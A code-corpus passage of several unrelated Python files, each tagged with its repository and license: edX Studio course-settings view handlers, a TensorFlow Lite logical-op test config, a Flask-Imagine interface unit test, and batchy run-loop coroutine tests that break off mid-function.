def _rerun_course(request, org, number, run, fields):
"""
Reruns an existing course.
Returns the URL for the course listing page.
"""
source_course_key = CourseKey.from_string(request.json.get('source_course_key'))
# verify user has access to the original course
if not has_studio_write_access(request.user, source_course_key):
raise PermissionDenied()
# create destination course key
store = modulestore()
with store.default_store('split'):
destination_course_key = store.make_course_key(org, number, run)
# verify org course and run don't already exist
if store.has_course(destination_course_key, ignore_case=True):
raise DuplicateCourseError(source_course_key, destination_course_key)
# Make sure user has instructor and staff access to the destination course
# so the user can see the updated status for that course
add_instructor(destination_course_key, request.user, request.user)
# Mark the action as initiated
CourseRerunState.objects.initiated(source_course_key, destination_course_key, request.user, fields['display_name'])
# Clear the fields that must be reset for the rerun
fields['advertised_start'] = None
# Rerun the course as a new celery task
json_fields = json.dumps(fields, cls=EdxJSONEncoder)
rerun_course.delay(unicode(source_course_key), unicode(destination_course_key), request.user.id, json_fields)
# Return course listing page
return JsonResponse({
'url': reverse_url('course_handler'),
'destination_course_key': unicode(destination_course_key)
})
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(["GET"])
def course_info_handler(request, course_key_string):
"""
GET
html: return html for editing the course info handouts and updates.
"""
try:
course_key = CourseKey.from_string(course_key_string)
except InvalidKeyError:
raise Http404
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if not course_module:
raise Http404
if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
return render_to_response(
'course_info.html',
{
'context_course': course_module,
'updates_url': reverse_course_url('course_info_update_handler', course_key),
'handouts_locator': course_key.make_usage_key('course_info', 'handouts'),
'base_asset_url': StaticContent.get_base_url_path_for_course_assets(course_module.id),
'push_notification_enabled': push_notification_enabled()
}
)
else:
return HttpResponseBadRequest("Only supports html requests")
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
@expect_json
def course_info_update_handler(request, course_key_string, provided_id=None):
"""
restful CRUD operations on course_info updates.
provided_id should be none if it's new (create) and index otherwise.
GET
json: return the course info update models
POST
json: create an update
PUT or DELETE
json: change an existing update
"""
if 'application/json' not in request.META.get('HTTP_ACCEPT', 'application/json'):
return HttpResponseBadRequest("Only supports json requests")
course_key = CourseKey.from_string(course_key_string)
usage_key = course_key.make_usage_key('course_info', 'updates')
if provided_id == '':
provided_id = None
# check that logged in user has permissions to this item (GET shouldn't require this level?)
if not has_studio_write_access(request.user, usage_key.course_key):
raise PermissionDenied()
if request.method == 'GET':
course_updates = get_course_updates(usage_key, provided_id, request.user.id)
if isinstance(course_updates, dict) and course_updates.get('error'):
return JsonResponse(course_updates, course_updates.get('status', 400))
else:
return JsonResponse(course_updates)
elif request.method == 'DELETE':
try:
return JsonResponse(delete_course_update(usage_key, request.json, provided_id, request.user))
except:
return HttpResponseBadRequest(
"Failed to delete",
content_type="text/plain"
)
# can be either and sometimes django is rewriting one to the other:
elif request.method in ('POST', 'PUT'):
try:
return JsonResponse(update_course_updates(usage_key, request.json, provided_id, request.user))
except:
return HttpResponseBadRequest(
"Failed to save",
content_type="text/plain"
)
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "PUT", "POST"))
@expect_json
def settings_handler(request, course_key_string):
"""
Course settings for dates and about pages
GET
html: get the page
json: get the CourseDetails model
PUT
json: update the Course and About xblocks through the CourseDetails model
"""
course_key = CourseKey.from_string(course_key_string)
credit_eligibility_enabled = settings.FEATURES.get('ENABLE_CREDIT_ELIGIBILITY', False)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
upload_asset_url = reverse_course_url('assets_handler', course_key)
# see if the ORG of this course can be attributed to a 'Microsite'. In that case, the
# course about page should be editable in Studio
marketing_site_enabled = microsite.get_value_for_org(
course_module.location.org,
'ENABLE_MKTG_SITE',
settings.FEATURES.get('ENABLE_MKTG_SITE', False)
)
about_page_editable = not marketing_site_enabled
enrollment_end_editable = GlobalStaff().has_user(request.user) or not marketing_site_enabled
short_description_editable = settings.FEATURES.get('EDITABLE_SHORT_DESCRIPTION', True)
self_paced_enabled = SelfPacedConfiguration.current().enabled
settings_context = {
'context_course': course_module,
'course_locator': course_key,
'lms_link_for_about_page': utils.get_lms_link_for_about_page(course_key),
'course_image_url': utils.course_image_url(course_module),
'details_url': reverse_course_url('settings_handler', course_key),
'about_page_editable': about_page_editable,
'short_description_editable': short_description_editable,
'upload_asset_url': upload_asset_url,
'course_handler_url': reverse_course_url('course_handler', course_key),
'language_options': settings.ALL_LANGUAGES,
'credit_eligibility_enabled': credit_eligibility_enabled,
'is_credit_course': False,
'show_min_grade_warning': False,
'enrollment_end_editable': enrollment_end_editable,
'is_prerequisite_courses_enabled': is_prerequisite_courses_enabled(),
'is_entrance_exams_enabled': is_entrance_exams_enabled(),
'self_paced_enabled': self_paced_enabled,
}
if is_prerequisite_courses_enabled():
courses, in_process_course_actions = get_courses_accessible_to_user(request)
# exclude current course from the list of available courses
courses = [course for course in courses if course.id != course_key]
if courses:
courses = _remove_in_process_courses(courses, in_process_course_actions)
settings_context.update({'possible_pre_requisite_courses': courses})
if credit_eligibility_enabled:
if is_credit_course(course_key):
# get and all credit eligibility requirements
credit_requirements = get_credit_requirements(course_key)
# pair together requirements with same 'namespace' values
paired_requirements = {}
for requirement in credit_requirements:
namespace = requirement.pop("namespace")
paired_requirements.setdefault(namespace, []).append(requirement)
# if 'minimum_grade_credit' of a course is not set or 0 then
# show warning message to course author.
show_min_grade_warning = False if course_module.minimum_grade_credit > 0 else True
settings_context.update(
{
'is_credit_course': True,
'credit_requirements': paired_requirements,
'show_min_grade_warning': show_min_grade_warning,
}
)
return render_to_response('settings.html', settings_context)
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
course_details = CourseDetails.fetch(course_key)
return JsonResponse(
course_details,
# encoder serializes dates, old locations, and instances
encoder=CourseSettingsEncoder
)
# For every other possible method type submitted by the caller...
else:
# if pre-requisite course feature is enabled set pre-requisite course
if is_prerequisite_courses_enabled():
prerequisite_course_keys = request.json.get('pre_requisite_courses', [])
if prerequisite_course_keys:
if not all(is_valid_course_key(course_key) for course_key in prerequisite_course_keys):
return JsonResponseBadRequest({"error": _("Invalid prerequisite course key")})
set_prerequisite_courses(course_key, prerequisite_course_keys)
# If the entrance exams feature has been enabled, we'll need to check for some
# feature-specific settings and handle them accordingly
# We have to be careful that we're only executing the following logic if we actually
# need to create or delete an entrance exam from the specified course
if is_entrance_exams_enabled():
course_entrance_exam_present = course_module.entrance_exam_enabled
entrance_exam_enabled = request.json.get('entrance_exam_enabled', '') == 'true'
ee_min_score_pct = request.json.get('entrance_exam_minimum_score_pct', None)
# If the entrance exam box on the settings screen has been checked...
if entrance_exam_enabled:
# Load the default minimum score threshold from settings, then try to override it
entrance_exam_minimum_score_pct = float(settings.ENTRANCE_EXAM_MIN_SCORE_PCT)
if ee_min_score_pct:
entrance_exam_minimum_score_pct = float(ee_min_score_pct)
if entrance_exam_minimum_score_pct.is_integer():
entrance_exam_minimum_score_pct = entrance_exam_minimum_score_pct / 100
entrance_exam_minimum_score_pct = unicode(entrance_exam_minimum_score_pct)
# If there's already an entrance exam defined, we'll update the existing one
if course_entrance_exam_present:
exam_data = {
'entrance_exam_minimum_score_pct': entrance_exam_minimum_score_pct
}
update_entrance_exam(request, course_key, exam_data)
# If there's no entrance exam defined, we'll create a new one
else:
create_entrance_exam(request, course_key, entrance_exam_minimum_score_pct)
# If the entrance exam box on the settings screen has been unchecked,
# and the course has an entrance exam attached...
elif not entrance_exam_enabled and course_entrance_exam_present:
delete_entrance_exam(request, course_key)
# Perform the normal update workflow for the CourseDetails model
return JsonResponse(
CourseDetails.update_from_json(course_key, request.json, request.user),
encoder=CourseSettingsEncoder
)
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
@expect_json
def grading_handler(request, course_key_string, grader_index=None):
"""
Course Grading policy configuration
GET
html: get the page
json no grader_index: get the CourseGrading model (graceperiod, cutoffs, and graders)
json w/ grader_index: get the specific grader
PUT
json no grader_index: update the Course through the CourseGrading model
json w/ grader_index: create or update the specific grader (create if index out of range)
"""
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
course_details = CourseGradingModel.fetch(course_key)
return render_to_response('settings_graders.html', {
'context_course': course_module,
'course_locator': course_key,
'course_details': course_details,
'grading_url': reverse_course_url('grading_handler', course_key),
'is_credit_course': is_credit_course(course_key),
})
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
if grader_index is None:
return JsonResponse(
CourseGradingModel.fetch(course_key),
# encoder serializes dates, old locations, and instances
encoder=CourseSettingsEncoder
)
else:
return JsonResponse(CourseGradingModel.fetch_grader(course_key, grader_index))
elif request.method in ('POST', 'PUT'): # post or put, doesn't matter.
# update credit course requirements if 'minimum_grade_credit'
# field value is changed
if 'minimum_grade_credit' in request.json:
update_credit_course_requirements.delay(unicode(course_key))
# None implies update the whole model (cutoffs, graceperiod, and graders) not a specific grader
if grader_index is None:
return JsonResponse(
CourseGradingModel.update_from_json(course_key, request.json, request.user),
encoder=CourseSettingsEncoder
)
else:
return JsonResponse(
CourseGradingModel.update_grader_from_json(course_key, request.json, request.user)
)
elif request.method == "DELETE" and grader_index is not None:
CourseGradingModel.delete_grader(course_key, grader_index, request.user)
return JsonResponse()
def _refresh_course_tabs(request, course_module):
"""
Automatically adds/removes tabs if changes to the course require them.
Raises:
InvalidTabsException: raised if there's a problem with the new version of the tabs.
"""
def update_tab(tabs, tab_type, tab_enabled):
"""
Adds or removes a course tab based upon whether it is enabled.
"""
tab_panel = {
"type": tab_type.type,
}
has_tab = tab_panel in tabs
if tab_enabled and not has_tab:
tabs.append(CourseTab.from_json(tab_panel))
elif not tab_enabled and has_tab:
tabs.remove(tab_panel)
course_tabs = copy.copy(course_module.tabs)
# Additionally update any tabs that are provided by non-dynamic course views
for tab_type in CourseTabPluginManager.get_tab_types():
if not tab_type.is_dynamic and tab_type.is_default:
tab_enabled = tab_type.is_enabled(course_module, user=request.user)
update_tab(course_tabs, tab_type, tab_enabled)
CourseTabList.validate_tabs(course_tabs)
# Save the tabs into the course if they have been changed
if course_tabs != course_module.tabs:
course_module.tabs = course_tabs
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT"))
@expect_json
def advanced_settings_handler(request, course_key_string):
"""
Course settings configuration
GET
html: get the page
json: get the model
PUT, POST
json: update the Course's settings. The payload is a json rep of the
metadata dicts.
"""
course_key = CourseKey.from_string(course_key_string)
with modulestore().bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', '') and request.method == 'GET':
return render_to_response('settings_advanced.html', {
'context_course': course_module,
'advanced_dict': CourseMetadata.fetch(course_module),
'advanced_settings_url': reverse_course_url('advanced_settings_handler', course_key)
})
elif 'application/json' in request.META.get('HTTP_ACCEPT', ''):
if request.method == 'GET':
return JsonResponse(CourseMetadata.fetch(course_module))
else:
try:
# validate data formats and update the course module.
# Note: don't update mongo yet, but wait until after any tabs are changed
is_valid, errors, updated_data = CourseMetadata.validate_and_update_from_json(
course_module,
request.json,
user=request.user,
)
if is_valid:
try:
# update the course tabs if required by any setting changes
_refresh_course_tabs(request, course_module)
except InvalidTabsException as err:
log.exception(err.message)
response_message = [
{
'message': _('An error occurred while trying to save your tabs'),
'model': {'display_name': _('Tabs Exception')}
}
]
return JsonResponseBadRequest(response_message)
# now update mongo
modulestore().update_item(course_module, request.user.id)
return JsonResponse(updated_data)
else:
return JsonResponseBadRequest(errors)
# Handle all errors that validation doesn't catch
except (TypeError, ValueError, InvalidTabsException) as err:
return HttpResponseBadRequest(
django.utils.html.escape(err.message),
content_type="text/plain"
)
class TextbookValidationError(Exception):
"An error thrown when a textbook input is invalid"
pass
def validate_textbooks_json(text):
"""
Validate the given text as representing a single PDF textbook
"""
try:
textbooks = json.loads(text)
except ValueError:
raise TextbookValidationError("invalid JSON")
if not isinstance(textbooks, (list, tuple)):
raise TextbookValidationError("must be JSON list")
for textbook in textbooks:
validate_textbook_json(textbook)
# check specified IDs for uniqueness
all_ids = [textbook["id"] for textbook in textbooks if "id" in textbook]
unique_ids = set(all_ids)
if len(all_ids) > len(unique_ids):
raise TextbookValidationError("IDs must be unique")
return textbooks
def validate_textbook_json(textbook):
"""
Validate the given text as representing a list of PDF textbooks
"""
if isinstance(textbook, basestring):
try:
textbook = json.loads(textbook)
except ValueError:
raise TextbookValidationError("invalid JSON")
if not isinstance(textbook, dict):
raise TextbookValidationError("must be JSON object")
if not textbook.get("tab_title"):
raise TextbookValidationError("must have tab_title")
tid = unicode(textbook.get("id", ""))
if tid and not tid[0].isdigit():
raise TextbookValidationError("textbook ID must start with a digit")
return textbook
def assign_textbook_id(textbook, used_ids=()):
"""
Return an ID that can be assigned to a textbook
and doesn't match the used_ids
"""
tid = Location.clean(textbook["tab_title"])
if not tid[0].isdigit():
# stick a random digit in front
tid = random.choice(string.digits) + tid
while tid in used_ids:
# add a random ASCII character to the end
tid = tid + random.choice(string.ascii_lowercase)
return tid
@require_http_methods(("GET", "POST", "PUT"))
@login_required
@ensure_csrf_cookie
def textbooks_list_handler(request, course_key_string):
"""
A RESTful handler for textbook collections.
GET
html: return textbook list page (Backbone application)
json: return JSON representation of all textbooks in this course
POST
json: create a new textbook for this course
PUT
json: overwrite all textbooks in the course with the given list
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
if "application/json" not in request.META.get('HTTP_ACCEPT', 'text/html'):
# return HTML page
upload_asset_url = reverse_course_url('assets_handler', course_key)
textbook_url = reverse_course_url('textbooks_list_handler', course_key)
return render_to_response('textbooks.html', {
'context_course': course,
'textbooks': course.pdf_textbooks,
'upload_asset_url': upload_asset_url,
'textbook_url': textbook_url,
})
# from here on down, we know the client has requested JSON
if request.method == 'GET':
return JsonResponse(course.pdf_textbooks)
elif request.method == 'PUT':
try:
textbooks = validate_textbooks_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
tids = set(t["id"] for t in textbooks if "id" in t)
for textbook in textbooks:
if "id" not in textbook:
tid = assign_textbook_id(textbook, tids)
textbook["id"] = tid
tids.add(tid)
if not any(tab['type'] == 'pdf_textbooks' for tab in course.tabs):
course.tabs.append(CourseTab.load('pdf_textbooks'))
course.pdf_textbooks = textbooks
store.update_item(course, request.user.id)
return JsonResponse(course.pdf_textbooks)
elif request.method == 'POST':
# create a new textbook for the course
try:
textbook = validate_textbook_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
if not textbook.get("id"):
tids = set(t["id"] for t in course.pdf_textbooks if "id" in t)
textbook["id"] = assign_textbook_id(textbook, tids)
existing = course.pdf_textbooks
existing.append(textbook)
course.pdf_textbooks = existing
if not any(tab['type'] == 'pdf_textbooks' for tab in course.tabs):
course.tabs.append(CourseTab.load('pdf_textbooks'))
store.update_item(course, request.user.id)
resp = JsonResponse(textbook, status=201)
resp["Location"] = reverse_course_url(
'textbooks_detail_handler',
course.id,
kwargs={'textbook_id': textbook["id"]}
)
return resp
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
def textbooks_detail_handler(request, course_key_string, textbook_id):
"""
JSON API endpoint for manipulating a textbook via its internal ID.
Used by the Backbone application.
GET
json: return JSON representation of textbook
POST or PUT
json: update textbook based on provided information
DELETE
json: remove textbook
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course_module = get_course_and_check_access(course_key, request.user)
matching_id = [tb for tb in course_module.pdf_textbooks
if unicode(tb.get("id")) == unicode(textbook_id)]
if matching_id:
textbook = matching_id[0]
else:
textbook = None
if request.method == 'GET':
if not textbook:
return JsonResponse(status=404)
return JsonResponse(textbook)
elif request.method in ('POST', 'PUT'): # can be either and sometimes
# django is rewriting one to the other
try:
new_textbook = validate_textbook_json(request.body)
except TextbookValidationError as err:
return JsonResponse({"error": err.message}, status=400)
new_textbook["id"] = textbook_id
if textbook:
i = course_module.pdf_textbooks.index(textbook)
new_textbooks = course_module.pdf_textbooks[0:i]
new_textbooks.append(new_textbook)
new_textbooks.extend(course_module.pdf_textbooks[i + 1:])
course_module.pdf_textbooks = new_textbooks
else:
course_module.pdf_textbooks.append(new_textbook)
store.update_item(course_module, request.user.id)
return JsonResponse(new_textbook, status=201)
elif request.method == 'DELETE':
if not textbook:
return JsonResponse(status=404)
i = course_module.pdf_textbooks.index(textbook)
remaining_textbooks = course_module.pdf_textbooks[0:i]
remaining_textbooks.extend(course_module.pdf_textbooks[i + 1:])
course_module.pdf_textbooks = remaining_textbooks
store.update_item(course_module, request.user.id)
return JsonResponse()
def remove_content_or_experiment_group(request, store, course, configuration, group_configuration_id, group_id=None):
"""
Remove content group or experiment group configuration only if it's not in use.
"""
configuration_index = course.user_partitions.index(configuration)
if configuration.scheme.name == RANDOM_SCHEME:
usages = GroupConfiguration.get_content_experiment_usage_info(store, course)
used = int(group_configuration_id) in usages
if used:
return JsonResponse(
{"error": _("This group configuration is in use and cannot be deleted.")},
status=400
)
course.user_partitions.pop(configuration_index)
elif configuration.scheme.name == COHORT_SCHEME:
if not group_id:
return JsonResponse(status=404)
group_id = int(group_id)
usages = GroupConfiguration.get_content_groups_usage_info(store, course)
used = group_id in usages
if used:
return JsonResponse(
{"error": _("This content group is in use and cannot be deleted.")},
status=400
)
matching_groups = [group for group in configuration.groups if group.id == group_id]
if matching_groups:
group_index = configuration.groups.index(matching_groups[0])
configuration.groups.pop(group_index)
else:
return JsonResponse(status=404)
course.user_partitions[configuration_index] = configuration
store.update_item(course, request.user.id)
return JsonResponse(status=204)
@require_http_methods(("GET", "POST"))
@login_required
@ensure_csrf_cookie
def group_configurations_list_handler(request, course_key_string):
"""
A RESTful handler for Group Configurations
GET
html: return Group Configurations list page (Backbone application)
POST
json: create new group configuration
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
group_configuration_url = reverse_course_url('group_configurations_list_handler', course_key)
course_outline_url = reverse_course_url('course_handler', course_key)
should_show_experiment_groups = are_content_experiments_enabled(course)
if should_show_experiment_groups:
experiment_group_configurations = GroupConfiguration.get_split_test_partitions_with_usage(store, course)
else:
experiment_group_configurations = None
content_group_configuration = GroupConfiguration.get_or_create_content_group(store, course)
return render_to_response('group_configurations.html', {
'context_course': course,
'group_configuration_url': group_configuration_url,
'course_outline_url': course_outline_url,
'experiment_group_configurations': experiment_group_configurations,
'should_show_experiment_groups': should_show_experiment_groups,
'content_group_configuration': content_group_configuration
})
elif "application/json" in request.META.get('HTTP_ACCEPT'):
if request.method == 'POST':
# create a new group configuration for the course
try:
new_configuration = GroupConfiguration(request.body, course).get_user_partition()
except GroupConfigurationsValidationError as err:
return JsonResponse({"error": err.message}, status=400)
course.user_partitions.append(new_configuration)
response = JsonResponse(new_configuration.to_json(), status=201)
response["Location"] = reverse_course_url(
'group_configurations_detail_handler',
course.id,
kwargs={'group_configuration_id': new_configuration.id}
)
store.update_item(course, request.user.id)
return response
else:
return HttpResponse(status=406)
@login_required
@ensure_csrf_cookie
@require_http_methods(("POST", "PUT", "DELETE"))
def group_configurations_detail_handler(request, course_key_string, group_configuration_id, group_id=None):
"""
JSON API endpoint for manipulating a group configuration via its internal ID.
Used by the Backbone application.
POST or PUT
json: update group configuration based on provided information
"""
course_key = CourseKey.from_string(course_key_string)
store = modulestore()
with store.bulk_operations(course_key):
course = get_course_and_check_access(course_key, request.user)
matching_id = [p for p in course.user_partitions
if unicode(p.id) == unicode(group_configuration_id)]
if matching_id:
configuration = matching_id[0]
else:
configuration = None
if request.method in ('POST', 'PUT'): # can be either and sometimes
# django is rewriting one to the other
try:
new_configuration = GroupConfiguration(request.body, course, group_configuration_id).get_user_partition()
except GroupConfigurationsValidationError as err:
return JsonResponse({"error": err.message}, status=400)
if configuration:
index = course.user_partitions.index(configuration)
course.user_partitions[index] = new_configuration
else:
course.user_partitions.append(new_configuration)
store.update_item(course, request.user.id)
configuration = GroupConfiguration.update_usage_info(store, course, new_configuration)
return JsonResponse(configuration, status=201)
elif request.method == "DELETE":
if not configuration:
return JsonResponse(status=404)
return remove_content_or_experiment_group(
request=request,
store=store,
course=course,
configuration=configuration,
group_configuration_id=group_configuration_id,
group_id=group_id
)
def are_content_experiments_enabled(course):
"""
Returns True if content experiments have been enabled for the course.
"""
return (
SPLIT_TEST_COMPONENT_TYPE in ADVANCED_COMPONENT_TYPES and
SPLIT_TEST_COMPONENT_TYPE in course.advanced_modules
)
def _get_course_creator_status(user):
"""
Helper method for returning the course creator status for a particular user,
taking into account the values of DISABLE_COURSE_CREATION and ENABLE_CREATOR_GROUP.
If the user passed in has not previously visited the index page, it will be
added with status 'unrequested' if the course creator group is in use.
"""
if user.is_staff:
course_creator_status = 'granted'
elif settings.FEATURES.get('DISABLE_COURSE_CREATION', False):
course_creator_status = 'disallowed_for_this_site'
elif settings.FEATURES.get('ENABLE_CREATOR_GROUP', False):
course_creator_status = get_course_creator_status(user)
if course_creator_status is None:
# User not grandfathered in as an existing user, has not previously visited the dashboard page.
# Add the user to the course creator admin table with status 'unrequested'.
add_user_with_status_unrequested(user)
course_creator_status = get_course_creator_status(user)
else:
course_creator_status = 'granted'
return course_creator_status
| hamzehd/edx-platform | cms/djangoapps/contentstore/views/course.py | Python | agpl-3.0 | 67,900 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for logic operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
def _make_logical_tests(op):
"""Make a set of tests to do logical operations."""
def logical(options, expected_tf_failures=0):
"""Generate examples."""
test_parameters = [{
"input_shape_pair": [([], []), ([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the logical testing graph."""
input_value1 = tf.compat.v1.placeholder(
dtype=tf.bool, name="input1", shape=parameters["input_shape_pair"][0])
input_value2 = tf.compat.v1.placeholder(
dtype=tf.bool, name="input2", shape=parameters["input_shape_pair"][1])
out = op(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(tf.bool,
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return logical
@register_make_test_function()
def make_logical_or_tests(options):
"""Make a set of tests to do logical_or."""
return _make_logical_tests(tf.logical_or)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_and_tests(options):
"""Make a set of tests to do logical_and."""
return _make_logical_tests(tf.logical_and)(options, expected_tf_failures=1)
@register_make_test_function()
def make_logical_xor_tests(options):
"""Make a set of tests to do logical_xor, test logical_not as well."""
return _make_logical_tests(tf.math.logical_xor)(
options, expected_tf_failures=1)
| ppwwyyxx/tensorflow | tensorflow/lite/testing/op_tests/logic.py | Python | apache-2.0 | 3,152 |
import unittest
from flask.ext.imagine.filters.interface import ImagineFilterInterface
class TestImagineFilterInterface(unittest.TestCase):
interface = None
def setUp(self):
self.interface = ImagineFilterInterface()
def test_not_implemented_apply_method(self):
with self.assertRaises(NotImplementedError):
self.interface.apply('')
| FlaskGuys/Flask-Imagine | tests/filters/test_interface.py | Python | mit | 375 |
import sys
from unittest.case import SkipTest
from batchy.compat import PY3
from batchy.local import RunLoopLocal
from batchy.runloop import coro_return, runloop_coroutine, deferred, future, current_run_loop, wait
from . import BaseTestCase
@runloop_coroutine()
def increment(arg):
coro_return(arg + 1)
yield
@runloop_coroutine()
def add_2(arg):
arg = yield increment(arg)
arg = yield increment(arg)
coro_return(arg)
yield
@runloop_coroutine()
def return_none():
coro_return(None)
yield
@runloop_coroutine()
def raise_value_error():
raise ValueError()
yield # pylint: disable-msg=W0101
@runloop_coroutine()
def block_loop(n):
"""Blocks the run loop for n iterations."""
d = yield deferred()
cnt = [n]
def unblock(_):
cnt[0] -= 1
if cnt[0] == 0:
d.set_value(1)
with current_run_loop().on_queue_exhausted.connected_to(unblock):
yield d
class RunLoopTests(BaseTestCase):
def test_simple_runnable(self):
self.assert_equal(1, increment(0))
self.assert_equal(2, increment(1))
def test_simple_runnable_py3(self):
if not PY3:
raise SkipTest()
exec("""
@runloop_coroutine()
def increment_py3(arg):
return arg + 1
yield
""", locals(), globals())
self.assert_equal(1, increment_py3(0))
self.assert_equal(2, increment_py3(1))
def test_dependencies(self):
self.assert_equal(2, add_2(0))
self.assert_equal(3, add_2(1))
def test_list_dependencies(self):
@runloop_coroutine()
def add_2_parallel(arg):
arg1, arg2 = yield increment(arg), increment(0)
coro_return(arg1+arg2)
self.assert_equal(2, add_2_parallel(0))
self.assert_equal(3, add_2_parallel(1))
def test_list_dependency_ordering(self):
result = []
@runloop_coroutine()
def append(x):
result.append(x)
yield
@runloop_coroutine()
def test():
yield [append(x) for x in range(100)]
test()
self.assert_equals(list(range(100)), result)
def test_dict_dependencies(self):
@runloop_coroutine()
def add_2_dict(arg):
d = yield {'a': increment(arg), 'b': increment(0), 'c': return_none()}
self.assert_equal(None, d['c'])
coro_return(d['a'] + d['b'])
self.assert_equal(2, add_2_dict(0))
self.assert_equal(3, add_2_dict(1))
def test_no_dependencies(self):
@runloop_coroutine()
def coro():
yield
self.assert_equals(None, coro())
def test_local(self):
local = RunLoopLocal()
@runloop_coroutine()
def test():
local.hi = getattr(local, 'hi', 0) + 1
local.hello = 'boo'
del local.hello
coro_return((local.hi, getattr(local, 'hello', None)))
yield
def set_something():
local.hi = 1
self.assert_raises(RuntimeError, set_something)
self.assert_equals((1, None), test())
self.assert_equals((1, None), test())
def test_exception(self):
@runloop_coroutine()
def test(a):
try:
yield raise_value_error()
except ValueError:
v = yield increment(a)
coro_return(v)
self.assert_equals(2, test(1))
self.assert_equals(3, test(2))
def test_multiple_exception(self):
@runloop_coroutine()
def test(a):
err = raise_value_error()
try:
yield err, block_loop(1)
except ValueError:
v = yield increment(a)
coro_return(v)
self.assert_equals(2, test(1))
self.assert_equals(3, test(2))
def test_deferred_simple(self):
obj = [None]
@runloop_coroutine()
def task():
obj[0] = d = yield deferred()
if __debug__:
self.assert_raises(ValueError, d.get)
v = yield d
coro_return(v)
def set_value(_):
obj[0].set_value(3)
@runloop_coroutine()
def test():
with current_run_loop().on_queue_exhausted.connected_to(set_value):
v = yield task()
coro_return(v)
self.assert_equal(3, test())
def test_deferred_easy(self):
obj = [None]
@runloop_coroutine()
def task():
obj[0] = d = yield deferred()
d.set_value(3)
v = yield d
coro_return(v)
@runloop_coroutine()
def test():
v = yield task()
coro_return(v)
self.assert_equal(3, test())
def test_deferred_exception(self):
obj = [None]
@runloop_coroutine()
def task():
obj[0] = d = yield deferred()
v = yield d
coro_return(v)
def set_value(_):
try:
raise ValueError()
except ValueError:
obj[0].set_exception(*sys.exc_info())
@runloop_coroutine()
def test():
with current_run_loop().on_queue_exhausted.connected_to(set_value):
v = yield task()
coro_return(v)
@runloop_coroutine()
def test2():
with current_run_loop().on_queue_exhausted.connected_to(set_value):
x = test()
try:
yield x
except ValueError:
coro_return(1)
self.assert_raises(ValueError, test)
self.assert_equals(1, test2())
def test_block_loop(self):
total_iterations = [0]
def inc_total_iterations(_):
total_iterations[0] += 1
@runloop_coroutine()
def test():
with current_run_loop().on_iteration.connected_to(inc_total_iterations):
yield block_loop(1)
yield block_loop(1)
yield block_loop(1)
coro_return(1)
self.assert_equal(1, test())
self.assert_equal(total_iterations[0], 4-1) # the first loop isn't counted.
def test_future(self):
total_iterations = [0]
def inc_total_iterations(_):
total_iterations[0] += 1
@runloop_coroutine()
def test():
with current_run_loop().on_iteration.connected_to(inc_total_iterations):
v1 = yield future(block_loop(1))
v2 = yield future(block_loop(1))
v3 = yield future(block_loop(1))
self.assert_equal(0, total_iterations[0])
yield v1, v2, v3
coro_return(1)
self.assert_equal(1, test())
self.assert_equal(total_iterations[0], 2-1)
def test_future_exception(self):
total_iterations = [0]
def inc_total_iterations(_):
total_iterations[0] += 1
@runloop_coroutine()
def test():
with current_run_loop().on_iteration.connected_to(inc_total_iterations):
exc = yield future(raise_value_error())
v1 = yield future(block_loop(1))
v2 = yield future(block_loop(1))
v3 = yield future(block_loop(1))
self.assert_equal(0, total_iterations[0])
try:
yield exc
except ValueError:
self.assert_equal(0, total_iterations[0])
yield v1, v2, v3
coro_return(1)
